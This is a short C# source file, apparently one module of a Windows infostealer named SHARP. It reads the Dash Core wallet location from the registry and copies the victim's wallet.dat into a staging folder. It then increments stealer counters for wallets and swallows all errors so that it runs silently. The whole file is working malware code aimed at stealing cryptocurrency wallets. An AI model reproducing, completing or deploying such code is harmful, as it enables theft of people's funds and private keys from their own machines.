Files

24 lines
655 B
C#
Raw Permalink Normal View History

2026-08-27 11:22:57 -06:00
using Microsoft.Win32;
using System.IO;
namespace SHARP
{
internal class DashCore
{
public static void DSHcoinStr(string directorypath)
{
try
{
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("Software").OpenSubKey("Dash").OpenSubKey("Dash-Qt");
Directory.CreateDirectory(directorypath + "\\Wallets\\DashCore\\");
File.Copy(registryKey.GetValue("strDataDir").ToString() + "\\wallet.dat", directorypath + "\\DashCore\\wallet.dat");
++Counting.dashcore;
++Counting.Wallets;
}
catch
{
}
}
}
}